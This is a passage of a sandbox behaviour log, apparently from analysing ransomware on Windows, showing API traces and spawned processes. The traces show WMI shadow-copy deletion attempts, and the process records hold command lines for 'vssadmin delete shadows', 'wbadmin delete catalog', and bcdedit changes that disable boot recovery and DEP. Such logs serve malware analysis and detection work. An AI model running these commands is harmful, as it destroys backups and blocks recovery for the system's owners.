	[0046.862] free (_Block=0x13c9f0) 
	[0046.862] CoSetProxyBlanket (pProxy=0x203d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0046.864] IEnumWbemClassObject:Next (in: This=0x203d18, lTimeout=-1, uCount=0x1, apObjects=0x1bf680, puReturned=0x1bf690 | out: apObjects=0x1bf680*=0x203d80, puReturned=0x1bf690*=0x1) returned 0x0
	[0046.865] malloc (_Size=0x18) returned 0x13c9f0
	[0046.865] IWbemClassObject:Get (in: This=0x203d80, wszName="__PATH", lFlags=0, pVal=0x1bf6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0046.865] free (_Block=0x13c9f0) 
	[0046.865] malloc (_Size=0x800) returned 0x13cdc0
	[0046.865] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x13cdc0, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16
	[0046.866] FormatMessageW (in: dwFlags=0x2500, lpSource=0x13cdc0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1bf5c8, nSize=0x0, Arguments=0x1bf5d8 | out: lpBuffer="률2") returned 0x67
	[0046.866] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104
	[0046.866] malloc (_Size=0x68) returned 0x13d5d0
	[0046.866] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x13d5d0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", lpUsedDefaultChar=0x0) returned 104
	[0046.866] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff702ab0
	[0046.866] fprintf (in: _File=0x7fefdb62ab0, _Format="%s" | out: _File=0x7fefdb62ab0) returned 103
	[0046.867] fflush (in: _File=0x7fefdb62ab0 | out: _File=0x7fefdb62ab0) returned 0
	[0046.867] free (_Block=0x13d5d0) 
	[0046.867] free (_Block=0x13cdc0) 
	[0046.867] LocalFree (hMem=0x32b960) returned 0x0
	[0046.868] IWbemServices:DeleteInstance (in: This=0x203c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x80041002
	[0048.417] _CxxThrowException () 
	[0048.422] IUnknown:Release (This=0x203d18) returned 0x0
	[0048.424] IUnknown:Release (This=0x203d80) returned 0x0
	[0048.424] malloc (_Size=0x20) returned 0x13cdc0
	[0048.424] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0048.424] free (_Block=0x13c930) 
	[0048.424] free (_Block=0x13c8d0) 
	[0048.425] GetCurrentThreadId () returned 0x9d4
	[0048.425] ??0CHString@@QEAA@PEBG@Z () returned 0x1bf858
	[0048.425] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1bf858
	[0048.425] ??0CHString@@QEAA@XZ () returned 0x1bf5f0
	[0048.425] malloc (_Size=0x18) returned 0x13c8d0
	[0048.425] malloc (_Size=0x18) returned 0x13c930
	[0048.425] SysStringLen (param_1="") returned 0x0
	[0048.425] free (_Block=0x13c8d0) 
	[0048.425] CoCreateInstance (in: rclsid=0xff6973c0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff697390*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xff7029f8 | out: ppv=0xff7029f8*=0x1f1450) returned 0x0
	[0048.430] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1f1450, hRes=0x80041002, LocaleId=0x0, lFlags=0, MessageText=0x1bf5e8 | out: MessageText=0x1bf5e8*="Not found\r\n") returned 0x0
	[0048.432] free (_Block=0x13c930) 
	[0048.432] malloc (_Size=0x18) returned 0x13c930
	[0048.432] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x1f1450, hRes=0x80041002, LocaleId=0x0, lFlags=0, MessageText=0x1bf5e0 | out: MessageText=0x1bf5e0*="WMI") returned 0x0
	[0048.433] malloc (_Size=0x18) returned 0x13c8d0
	[0048.433] lstrlenW (lpString="WMI") returned 3
	[0048.433] lstrlenW (lpString="Wbem") returned 4
	[0048.433] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1
	[0048.433] lstrlenW (lpString="WMI") returned 3
	[0048.434] lstrlenW (lpString="WMI") returned 3
	[0048.434] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2
	[0048.434] WbemStatusCodeText:IUnknown:Release (This=0x1f1450) returned 0x0
	[0048.434] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0048.434] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x1bee50, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18
	[0048.434] FormatMessageW (in: dwFlags=0x2500, lpSource=0x1bee50, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1bee20, nSize=0x0, Arguments=0x1bee28 | out: lpBuffer="㷰.") returned 0x21
	[0048.434] malloc (_Size=0x18) returned 0x13c9f0
	[0048.434] LocalFree (hMem=0x2e3df0) returned 0x0
	[0048.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Not found\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34
	[0048.434] malloc (_Size=0x22) returned 0x13cdf0
	[0048.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Not found\r\n", cchWideChar=-1, lpMultiByteStr=0x13cdf0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Not found\r\n", lpUsedDefaultChar=0x0) returned 34
	[0048.434] fprintf (in: _File=0x7fefdb62ae0, _Format="%s" | out: _File=0x7fefdb62ae0) returned 33
	[0048.434] fflush (in: _File=0x7fefdb62ae0 | out: _File=0x7fefdb62ae0) returned 0
	[0048.434] free (_Block=0x13cdf0) 
	[0048.435] free (_Block=0x13c9f0) 
	[0048.435] free (_Block=0x13c8d0) 
	[0048.435] free (_Block=0x13c930) 
	[0048.435] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0048.435] ??0CHString@@QEAA@PEBG@Z () returned 0x1bf850
	[0048.435] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1bf850
	[0048.435] GetCurrentThreadId () returned 0x9d4
	[0048.435] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0048.435] WbemLocator:IUnknown:Release (This=0x203c18) returned 0x0
	[0048.518] ?Empty@CHString@@QEAAXXZ () returned 0x7fef875482c
	[0048.518] free (_Block=0x13cdc0) 
	[0048.519] _kbhit () returned 0x0
	[0048.522] free (_Block=0x13cac0) 
	[0048.522] free (_Block=0x13c7d0) 
	[0048.522] free (_Block=0x13c7b0) 
	[0048.522] free (_Block=0x13c790) 
	[0048.522] free (_Block=0x13c770) 
	[0048.522] free (_Block=0x136e70) 
	[0048.522] free (_Block=0x13c870) 
	[0048.522] free (_Block=0x138600) 
	[0048.522] free (_Block=0x13c8f0) 
	[0048.522] free (_Block=0x13ca40) 
	[0048.522] free (_Block=0x13c890) 
	[0048.522] free (_Block=0x13c910) 
	[0048.522] free (_Block=0x136e00) 
	[0048.522] free (_Block=0x136ce0) 
	[0048.522] free (_Block=0x13ca90) 
	[0048.523] ?Empty@CHString@@QEAAXXZ () returned 0x7fef875482c
	[0048.523] free (_Block=0x136ea0) 
	[0048.523] free (_Block=0x13c810) 
	[0048.523] free (_Block=0x13c830) 
	[0048.523] free (_Block=0x137f80) 
	[0048.523] free (_Block=0x1363e0) 
	[0048.523] free (_Block=0x136430) 
	[0048.523] free (_Block=0x13c7f0) 
	[0048.523] free (_Block=0x136500) 
	[0048.523] free (_Block=0x136cc0) 
	[0048.523] free (_Block=0x138040) 
	[0048.523] free (_Block=0x1368a0) 
	[0048.523] free (_Block=0x138000) 
	[0048.523] free (_Block=0x136840) 
	[0048.523] free (_Block=0x136860) 
	[0048.523] free (_Block=0x136720) 
	[0048.523] free (_Block=0x136740) 
	[0048.523] free (_Block=0x1366c0) 
	[0048.523] free (_Block=0x1366e0) 
	[0048.523] free (_Block=0x136780) 
	[0048.523] free (_Block=0x1367a0) 
	[0048.523] free (_Block=0x1367e0) 
	[0048.523] free (_Block=0x136800) 
	[0048.523] free (_Block=0x136600) 
	[0048.523] free (_Block=0x136620) 
	[0048.524] free (_Block=0x1365a0) 
	[0048.524] free (_Block=0x1365c0) 
	[0048.524] free (_Block=0x136660) 
	[0048.524] free (_Block=0x136680) 
	[0048.524] free (_Block=0x136540) 
	[0048.524] free (_Block=0x136560) 
	[0048.524] free (_Block=0x1364b0) 
	[0048.524] free (_Block=0x136480) 
	[0048.524] free (_Block=0x136d70) 
	[0048.524] WbemLocator:IUnknown:Release (This=0x1f1390) returned 0x2
	[0048.524] WbemLocator:IUnknown:Release (This=0x203b28) returned 0x0
	[0048.762] WbemLocator:IUnknown:Release (This=0x203a98) returned 0x0
	[0049.232] WbemLocator:IUnknown:Release (This=0x1f1390) returned 0x1
	[0049.232] ?Empty@CHString@@QEAAXXZ () returned 0x7fef875482c
	[0049.232] WbemLocator:IUnknown:Release (This=0x1f1390) returned 0x0
	[0049.233] free (_Block=0x13c6f0) 
	[0049.233] free (_Block=0x13c710) 
	[0049.233] free (_Block=0x138540) 
	[0049.233] free (_Block=0x13c730) 
	[0049.233] free (_Block=0x13c750) 
	[0049.233] free (_Block=0x138580) 
	[0049.233] free (_Block=0x13c570) 
	[0049.233] free (_Block=0x13c590) 
	[0049.233] free (_Block=0x1383c0) 
	[0049.233] free (_Block=0x13c5b0) 
	[0049.233] free (_Block=0x13c5d0) 
	[0049.233] free (_Block=0x138400) 
	[0049.233] free (_Block=0x13c4f0) 
	[0049.233] free (_Block=0x13c510) 
	[0049.233] free (_Block=0x138340) 
	[0049.233] free (_Block=0x13c530) 
	[0049.233] free (_Block=0x13c550) 
	[0049.233] free (_Block=0x138380) 
	[0049.233] free (_Block=0x13c670) 
	[0049.233] free (_Block=0x13c690) 
	[0049.233] free (_Block=0x1384c0) 
	[0049.234] free (_Block=0x13c6b0) 
	[0049.234] free (_Block=0x13c6d0) 
	[0049.234] free (_Block=0x138500) 
	[0049.234] free (_Block=0x13c470) 
	[0049.234] free (_Block=0x13c490) 
	[0049.234] free (_Block=0x1382c0) 
	[0049.234] free (_Block=0x13c4b0) 
	[0049.234] free (_Block=0x13c4d0) 
	[0049.234] free (_Block=0x138300) 
	[0049.234] free (_Block=0x13c5f0) 
	[0049.234] free (_Block=0x13c610) 
	[0049.234] free (_Block=0x138440) 
	[0049.234] free (_Block=0x13c630) 
	[0049.234] free (_Block=0x13c650) 
	[0049.234] free (_Block=0x138480) 
	[0049.234] free (_Block=0x13c3b0) 
	[0049.234] free (_Block=0x13c3d0) 
	[0049.234] free (_Block=0x138200) 
	[0049.234] free (_Block=0x13c270) 
	[0049.234] free (_Block=0x13c290) 
	[0049.234] free (_Block=0x1380c0) 
	[0049.234] free (_Block=0x136d30) 
	[0049.234] free (_Block=0x136d50) 
	[0049.234] free (_Block=0x138080) 
	[0049.235] free (_Block=0x13c2f0) 
	[0049.235] free (_Block=0x13c310) 
	[0049.235] free (_Block=0x138140) 
	[0049.235] free (_Block=0x13c3f0) 
	[0049.235] free (_Block=0x13c410) 
	[0049.235] free (_Block=0x138240) 
	[0049.235] free (_Block=0x13c2b0) 
	[0049.235] free (_Block=0x13c2d0) 
	[0049.235] free (_Block=0x138100) 
	[0049.235] free (_Block=0x13c330) 
	[0049.235] free (_Block=0x13c350) 
	[0049.235] free (_Block=0x138180) 
	[0049.235] free (_Block=0x13c370) 
	[0049.235] free (_Block=0x13c390) 
	[0049.235] free (_Block=0x1381c0) 
	[0049.235] free (_Block=0x13c430) 
	[0049.235] free (_Block=0x13c450) 
	[0049.235] free (_Block=0x138280) 
	[0049.235] CoUninitialize () 
	[0049.307] exit (_Code=-2147217406) 
	[0049.307] free (_Block=0x1385c0) 
	[0049.307] free (_Block=0x137c10) 
	[0049.307] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0049.307] free (_Block=0x136e20) 
	[0049.307] free (_Block=0x136520) 
	[0049.307] free (_Block=0x137bd0) 
	[0049.307] free (_Block=0x137b90) 
	[0049.307] free (_Block=0x137b40) 
	[0049.307] free (_Block=0x137b00) 
	[0049.307] free (_Block=0x137aa0) 
	[0049.307] free (_Block=0x135a90) 
	[0049.307] free (_Block=0x135a50) 
	[0049.307] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0049.307] free (_Block=0x13c850) 

Thread:
	id = 42
	os_tid = 0xa24


Thread:
	id = 60
	os_tid = 0xa74


Thread:
	id = 61
	os_tid = 0xa94


Thread:
	id = 62
	os_tid = 0xa98


Thread:
	id = 63
	os_tid = 0xa9c


Thread:
	id = 131
	os_tid = 0xafc


Process:
	id = "11"
	image_name = "bcdedit.exe"
	filename = "c:\\windows\\system32\\bcdedit.exe"
	page_root = "0x51238000"
	os_pid = "0x9d8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0x998"
	cmd_line = "bcdedit  /set {default} bootstatuspolicy ignoreallfailures"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 31
	os_tid = 0x9dc


Process:
	id = "12"
	image_name = "bcdedit.exe"
	filename = "c:\\windows\\system32\\bcdedit.exe"
	page_root = "0x4f3b2000"
	os_pid = "0x9e0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "7"
	os_parent_pid = "0x9b8"
	cmd_line = "bcdedit.exe  /set {current} nx AlwaysOff"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 32
	os_tid = 0x9e4


Process:
	id = "13"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\system32\\vssadmin.exe"
	page_root = "0x4f411000"
	os_pid = "0x9e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0x9b0"
	cmd_line = "vssadmin.exe  delete shadows /all /quiet"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 33
	os_tid = 0x9ec


Thread:
	id = 37
	os_tid = 0xa0c


Thread:
	id = 39
	os_tid = 0xa18


Thread:
	id = 43
	os_tid = 0xa30


Thread:
	id = 44
	os_tid = 0xa40


Thread:
	id = 45
	os_tid = 0xa44


Process:
	id = "14"
	image_name = "wbadmin.exe"
	filename = "c:\\windows\\system32\\wbadmin.exe"
	page_root = "0x50534000"
	os_pid = "0x9f8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "5"
	os_parent_pid = "0x9a8"
	cmd_line = "wbadmin  delete catalog -quiet"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 34
	os_tid = 0x9fc


Thread:
	id = 35
	os_tid = 0xa00


Thread:
	id = 36
	os_tid = 0xa08


Thread:
	id = 38
	os_tid = 0xa14


Thread:
	id = 40
	os_tid = 0xa1c


Thread:
	id = 41
	os_tid = 0xa20


Process:
	id = "15"
	image_name = "wbengine.exe"
	filename = "c:\\windows\\system32\\wbengine.exe"
	page_root = "0x4f65a000"
	os_pid = "0xa28"
	os_integrity_level = "0x4000"
	os_privileges = "0x20860100"
	monitor_reason = "rpc_server"
	parent_id = "14"
	os_parent_pid = "0x9f8"
	cmd_line = "\"C:\\Windows\\system32\\wbengine.exe\""
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00050fbc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 46
	os_tid = 0xa58


Thread:
	id = 47
	os_tid = 0xa54


Thread:
	id = 48
	os_tid = 0xa48


Thread:
	id = 49
	os_tid = 0xa3c


Thread:
	id = 50
	os_tid = 0xa38


Thread:
	id = 51
	os_tid = 0xa34


Thread:
	id = 52
	os_tid = 0xa2c


Thread:
	id = 148
	os_tid = 0xbd0


Process:
	id = "16"
	image_name = "vssvc.exe"
	filename = "c:\\windows\\system32\\vssvc.exe"
	page_root = "0x4f361000"
	os_pid = "0xa4c"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b7e890"
	monitor_reason = "rpc_server"
	parent_id = "13"
	os_parent_pid = "0x9e8"
	cmd_line = "C:\\Windows\\system32\\vssvc.exe"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000511ae" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 53
	os_tid = 0xa70


Thread:
	id = 54
	os_tid = 0xa6c


Thread:
	id = 55
	os_tid = 0xa68


Thread:
	id = 56
	os_tid = 0xa64

	[0039.997] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe6db70 | out: lpSystemTimeAsFileTime=0xe6db70*(dwLowDateTime=0xc3087e50, dwHighDateTime=0x1d5956c)) 
	[0040.002] GetCurrentProcessId () returned 0xa4c
	[0040.002] GetCurrentThreadId () returned 0xa64
	[0040.002] GetTickCount () returned 0x1143312
	[0040.002] QueryPerformanceCounter (in: lpPerformanceCount=0xe6db78 | out: lpPerformanceCount=0xe6db78*=16010656794) returned 1
	[0040.002] malloc (_Size=0x100) returned 0x458e80

Thread:
	id = 57
	os_tid = 0xa60


Thread:
	id = 58
	os_tid = 0xa5c


Thread:
	id = 59
	os_tid = 0xa50


Thread:
	id = 64
	os_tid = 0xaa8


Thread:
	id = 130
	os_tid = 0xaf8


Thread:
	id = 137
	os_tid = 0xba0


Process:
	id = "17"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x230f4000"
	os_pid = "0x36c"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "10"
	os_parent_pid = "0x9d0"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 65
	os_tid = 0x590


Thread:
	id = 66
	os_tid = 0x790


Thread:
	id = 67
	os_tid = 0x330


Thread:
	id = 68
	os_tid = 0x7f8


Thread:
	id = 69
	os_tid = 0x430


Thread:
	id = 70
	os_tid = 0x268


Thread:
	id = 71
	os_tid = 0x768


Thread:
	id = 72
	os_tid = 0x764


Thread:
	id = 73
	os_tid = 0x760


Thread:
	id = 74
	os_tid = 0x75c


Thread:
	id = 75
	os_tid = 0x70c


Thread:
	id = 76
	os_tid = 0x6e8


Thread:
	id = 77
	os_tid = 0x6d8


Thread:
	id = 78
	os_tid = 0x6d4


Thread:
	id = 79
	os_tid = 0x6c8


Thread:
	id = 80
	os_tid = 0x6c0


Thread:
	id = 81
	os_tid = 0x6b8


Thread:
	id = 82
	os_tid = 0x6a4


Thread:
	id = 83
	os_tid = 0x6a0


Thread:
	id = 84
	os_tid = 0x690


Thread:
	id = 85
	os_tid = 0x67c


Thread:
	id = 86
	os_tid = 0x490


Thread:
	id = 87
	os_tid = 0x454


Thread:
	id = 88
	os_tid = 0x450


Thread:
	id = 89
	os_tid = 0x428


Thread:
	id = 90
	os_tid = 0x424


Thread:
	id = 91
	os_tid = 0x420


Thread:
	id = 92
	os_tid = 0x404


Thread:
	id = 93
	os_tid = 0x18c


Thread:
	id = 94
	os_tid = 0xf0


Thread:
	id = 95
	os_tid = 0xc8


Thread:
	id = 96
	os_tid = 0x3f0


Thread:
	id = 97
	os_tid = 0x3e4


Thread:
	id = 98
	os_tid = 0x398


Thread:
	id = 99
	os_tid = 0x394


Thread:
	id = 100
	os_tid = 0x390


Thread:
	id = 101
	os_tid = 0x38c


Thread:
	id = 102
	os_tid = 0x378


Thread:
	id = 103
	os_tid = 0x370


Thread:
	id = 118
	os_tid = 0xac4


Thread:
	id = 119
	os_tid = 0xac8


Thread:
	id = 160
	os_tid = 0x840


Thread:
	id = 161
	os_tid = 0x41c


Thread:
	id = 162
	os_tid = 0x56c


Thread:
	id = 163
	os_tid = 0x874


Thread:
	id = 165
	os_tid = 0x880


Thread:
	id = 166
	os_tid = 0x878


Thread:
	id = 167
	os_tid = 0x870


Thread:
	id = 168
	os_tid = 0x86c


Thread:
	id = 169
	os_tid = 0x868


Thread:
	id = 170
	os_tid = 0x864


Thread:
	id = 173
	os_tid = 0x858


Thread:
	id = 174
	os_tid = 0x848


Process:
	id = "18"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x4f566000"
	os_pid = "0xa78"
	os_integrity_level = "0x4000"
	os_privileges = "0x60814080"
	monitor_reason = "rpc_server"
	parent_id = "16"
	os_parent_pid = "0xa4c"
	cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00051904" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 104
	os_tid = 0xabc


Thread:
	id = 105
	os_tid = 0xaac


Thread:
	id = 106
	os_tid = 0xaa4


Thread:
	id = 107
	os_tid = 0xaa0


Thread:
	id = 108
	os_tid = 0xa88


Thread:
	id = 109
	os_tid = 0xa7c


Thread:
	id = 138
	os_tid = 0xba4


Thread:
	id = 151
	os_tid = 0xbdc


Process:
	id = "19"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x66603000"
	os_pid = "0x7e0"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "17"
	os_parent_pid = "0x36c"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
